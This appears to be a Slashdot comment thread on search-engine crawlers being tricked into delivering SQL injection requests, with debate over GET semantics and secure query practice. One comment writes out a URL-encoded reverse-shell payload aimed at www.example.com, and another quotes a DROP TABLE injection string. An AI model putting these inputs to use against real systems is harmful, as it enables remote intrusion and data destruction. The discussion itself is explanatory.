Google Bots Doing SQL Injection Attacks
ccguy writes "It seems that while Google could really care less about your site and has no real interest in hacking you, their automated bots can be used to do the heavy lifting for an attacker. In this scenario, the bot was crawling Site A. Site A had a number of links embedded that had the SQLi requests to the target site, Site B. Google Bot then went about its business crawling pages and following links like a good boy, and in the process followed the links on Site A to Site B, and began to inadvertently attack Site B."
Doing a good deed for your competition by linking them from your site, hmm? :)
Laughter is the Spackle of the Soul.
not just "could care less". Sheeesh.
If you have http GET requests going (effectively) straight into your database, that's YOUR problem, not Google's.
How is that news? Zalewski wrote a book on that years ago ("Silence on the wire")
TFA seems to place all the faults on Google.
Fact is, Google is not the only one who is crawling the Net. Yahoo does it as well as Bing, among others.
If the Google "bots" can be tricked into doing the "heavy lifting", so can the Yahoo "bots", Bing "bots", and "bots" from other search engines.
In particular, the convention has been established that the GET and HEAD methods SHOULD NOT have the significance of taking an action other than retrieval. These methods ought to be considered "safe".
My Hello World is 512 bytes. But it's also a valid Fat12 boot sector, Fat12 file reader, and Pmode routine.
This is Slashdot. What do we know about GET HEAD methods?
That doesn't really have much to do with anything, a lot of DB connection/query libraries allow stacked queries to be performed (i.e. more than one queries, separated by ';') so by appending your own SQL query (say, a DELETE one) via a vulnerable input you can still do plenty of damage, even via a GET method.
TFA isn't newsworthy in my opinion, this has been known for a while now.
The trick is that retrieval can be dangerous by itself if you're using the database and forgot to sanitize your SQL. Being a moron can't be solved by an RFC.
This is Slashdot. What do we know about GET HEAD methods?
I was going to say that they return Futurama quotes but then I checked and they are gone. When did that happen?
My Hello World is 512 bytes. But it's also a valid Fat12 boot sector, Fat12 file reader, and Pmode routine.
Agreed 100%. This article is blaming Google for admins who had bad site design. Doing a GET should not have done this; it's their fault for embedding bad links in their HTML that is exposed to a crawler.
In particular, the convention has been established that the GET and HEAD methods SHOULD NOT have the significance of taking an action other than retrieval. These methods ought to be considered "safe".
That's the funny thing about SQL injection attacks - it can turn a SELECT into a DELETE or UPDATE. So you may have *meant* your GET request to be a simple retrieval, but a successful attack could make it do so much more.
Which is a great segue to the obligatory xkcd comic!
http://xkcd.com/327/
Well that's nice idea but literally every dynamic site ever breaks this convention, including the one you're using right now.
In the scenario listed, if you were the hacker trying to cover his tracks, how would you ever know if the attack was successful or not?
The problem with this line of thinking is that spiders are only supposed to crawl links. If you use a live link without authentication, shame on you. If you use a query to a db for something like a parts catalog that's capable of r/w, then shame on you. If you tether your logic through a pipe, the pipe needs parser constraints on the query.
Blaming Google or any other crawler-spider-bot, despite my other distain for Google, is pointing the finger at the wrong culprit. Everyone wants sub-second response times, but if you don't parse, you're a target for all sorts of injection goodies.
---- Teach Peace. It's Cheaper Than War.
If Microsoft follows links shown in "private" skype conversations (and probably several NSA programs too) they could be used to attack sites this way. Could be pretty ironic to have government sites with their DBs wiped from a SQL attack coming from an NSA server.
I was going to say that they return Futurama quotes but then I checked and they are gone. When did that happen?
When the devs starting getting real head?
When information is power, privacy is freedom.
I vaguely recall an article years ago on something like TheDailyWtf where some idiot webmaster wrote a web application with links instead of buttons to perform tasks, and was confused why his site and data was getting trashed repeatedly, until he figured out it was the crawling bots.
This is nothing new: unskilled developers using the wrong methods and getting burned.
What is going on?
It seems that while Google could really care less about your site and has no real interest in hacking you, their automated bots can be used to do the heavy lifting for an attacker.
no, what's really happening is someone posted an injection url on a forum somewhere and googlebot ran across it. come on, google bot hasn't become sentient or som-SORRY THIS POST WAS A MISTAKE DISREGARD ALL INFORMATION.
Anons need not reply. Questions end with a question mark.
I'm not sure to which line of thinking you're referring, both myself and the GP just posted a technical remark each. Also (to my great joy and surprise) no-one is blaming Google (at least not yet) and rightly so.
As for the back-end countermeasures you described, you are of course spot on, however it's safe to assume that if you're vulnerable to something as trivial and mundane as SQL injection, you won't have the required foresight to setup and use different DB roles, each with the absolutely least privs for the queries you expect to perform through them.
Yes, we agree; it's the problem with blaming Google, and affirmation of the sillyness. In my mind, which didn't get presented, and I apologize, is that query code has become awful, let-me-count-the-ways.
Further, when I'm forced, to, looking at page code makes me reel with revelation of the mindset of cut-and-paste APIs glued with mucilage (if it's that good). Everyone else now is to blame, not the moshpit of ducttaped code. Sorry, bad rant on a bad day.
---- Teach Peace. It's Cheaper Than War.
This guy(who I won't name, you know who you are), was once writing some PHP code for some webapp. Well in app, he had some delete links and he hadn't finished the authentication code apparently, so googlebot crawled is site, followed all of the delete links and completely wiped out his database.
Of course, you can keep googlebot away from your crappy code with robots.txt too...
'Someone failed at the most basic level here and it wasn't Google. From RFC 2616 (HTTP) Section 9.1 Safe and Idempotent Methods - "In particular, the convention has been established that the GET and HEAD methods SHOULD NOT have the significance of taking an action other than retrieval. These methods ought to be considered "safe"."`, Matthieu Heimer
That's the funny thing about programming -- you can enforce good behavior and block bad behavior.
s/['";-()&|*]/\\\1/g
The point is not that you can attack lousy website using GET requests. The idea is that HTTP firewalls shoud not blatlantly white-list google bots and other website crawlers in the sake of SEO optimization, because google bot will follow malicious links from other website..
So lets say you have a filter with rules that prevent common SQL injections in GET requests parameters, this is a weak security practice but can be useful to mitigate some 0-day attacks on vulnerable scripts. This protection can be by-passed IF you white-listed google bot.
If you want more performance, you should be using prepared statements and statement caching, not string concatenation to construct your queries.
Then you don't need to waste CPU time and memory escaping input data.
It's not the admins of the sites embedding the links that are the problem. They're they attackers. The fault lies with the admins of the sites the links point to.
Does it? The ajax requests slashdot uses make POST requests, not GET.
Anything handling a GET request shouldn't be using a database connection with delete, insert or update grants.
so by appending your own SQL query (say, a DELETE one) via a vulnerable input you can still do plenty of damage, even via a GET method.
That would be a bug in the application.
The HTTP spec doesn't let you say what could happen if there's a bug in the application. It could be designed so that all GETs are idempotent operations, but due to a bug they are not.
For all I know; if there's a bug in the application adding ?X=FOOBAR&do=%2Fbin%2Fbash%20-i%20%3E%2Fdev%2Ftcp%2Fwww.example.com%2F80%200%3C%261%202%3E%261 to the get string will drop me a shell; which is decidedly non-idempotent.
I'd say that since half of the subject of this discussion is about SQL injection, the webapps in question are axiomatically buggy.
So if you litter a page with malicious links, the attacks will look like they're coming from Google's servers.
That's kind of cool, actually.
I'd laugh my head off if Google were subsequently flagged as a malicious site. I *hate* bots.
I do not fail; I succeed at finding out what does not work.
But how would advertisers and the NSA track you then? ;)
Seriously though, are you saying that if you read some webmail with a "GET" the webmail app shouldn't mark the mail as read? Or that you'll have to add some AJAX to do mark it as read via POST requests?
There are very many different types of legitimate webapps in the world, as such it is really silly to think a GET request shouldn't do delete, insert or update.
This example is complete nonsense. Idempotence is the property of having the same result whether done once or any number of times. So, an email message being marked read if any GETs have been made is exactly the type of change that should be expected to occur as the result of a GET.
When I first started doing web apps, I made a basic demo of a contacts app and used links for the add, edit, and delete functions. One day I noticed all the data was gone. I figured someone had deleted it all for fun so I went in to restore from a backup and decided to look at the logs and see who it was. It was googlebot -- it had come walking through, dutifully clicking on every "delete" and "are you sure?" link until the content was gone.
(I knew about when to use GET versus POST -- it was just easier to show what was happening when you could mouse over the links and see the actions.)
Dear Slashdot: next time you want to mess with the site, add a rich-text editor for comments.
If there's a GET request that succesfully executes DROP DATABASE, it will have same "Error: can't connect to database" result on user's end and all data deleted on server's end however many times you call it. Idempotence!
is awesome.
Never say never. Ah!! I did it again!
Someone wrote a terrible web app, it could be attacked with simple GET requests. Someone else made those requests, but it was still a terrible web app. Nobody cares.
You'd have thought they learned their lesson when dealing with Bobby Tables, aka "Robert'); DROP TABLE Students;
This attack was described by Michal Zalewsky in Phrack 57 "Against the System: Rise of the Robots".
http://www.phrack.org/issues.html?issue=57&id=13#article
Release date? 2001.
Please don't spill your regurgitated news on my shoes.
If you think you need "a filter with rules that prevent common SQL injections in GET requests parameters", then you're doing something wrong.
I know, I know -- protection in depth and all that. But some things are just too fucking ugly to even think of them. Ugh
That's the funny thing about SQL injection attacks - it can turn a SELECT into a DELETE or UPDATE. So you may have *meant* your GET request to be a simple retrieval, but a successful attack could make it do so much more.
And you know what's the the funny thing about databases? It's that you can create users with read only access, if you really need those GET requests. Not sure if that's the best design (even a SELECT statement can reveal stuff that are not meant to be shown to the end user), but it sure leaves you with one less potential security hole to worry about.
So they do care a bit then?
The Caring Continuum - http://incompetech.com/Images/caring.png
Wanna buy a shirt?
https://www.redbubble.com/people/stealthfinger/shop?asc=u
In several cases, the SQLi target was posted in a hacking forum, blog or exploit site, then Google bots perform a request to the link and indexes it (title, content).
"It seems that while Google could really care less..."
should read:
"It seems that while Google really couldn't care less..."
My god, it's 2013 and where talking about SQL injection? If your not parameterizing your sql, your doing it wrong.
Michal Zalewski wrote about this "attack" in a phrack article back in 2001: http://www.cgisecurity.com/lib/Rise-of-the-robots.txt
Funny side note, he is now working in the Google Security Team
Some of us used to know about GET HEAD but it was overwritten by GET MARRIED
In 2001, Michal Zalewski published an article in Phrack #57 entitled “Against the System: Rise of the Robots” describing this very thing. In it, Zalewski described
a series of experiments he performed showing how the search engine indexing bots of the day could be misused to launch a variety of web attacks.
I independently rediscovered these issues in 2009 and reported them to Microsoft Bing and Google. Microsoft eventually made some changes to their search bot and credited me on their website, but Google basically responded that it "works as designed".
"couldn't care less"
If you could care less it would not really be worth mentioning.
Article X: The powers not delegated... by the Constitution...are reserved...to the people
The first time I saw this was in 2008. There was an attack that was spread in exactly this method. Here's an article on the exact attack. http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx
web bot follows web link on web page.
Even if you don't bother to edit your robots.txt file, I believe you can curtail this phenomenon by using POST rather than GET for links that change data
It's great that you and the other AC can describe programming best practices. Sounds like you've singlehanded solved the problem of bad programming. Now if you can just go back and fix up the millions of vulnerable sites, the world will be a better place.
Thank you.
I've seen these come from Google and Bing. One of the real threats is that you will not catch that it's coming from a legit crawler and block the IP. This could have dramatic effects on the SEO for a site.
I agree, "should of" must be avoided at all cost. He coulda used "shoulda" instead of "should of", it's a much more elegant solution.
And before anyone gets started, yes, the damn punctuation should go outside the quotation marks, because that's where logic (not to mention everyone outside of America) requires it to be! Deal with it.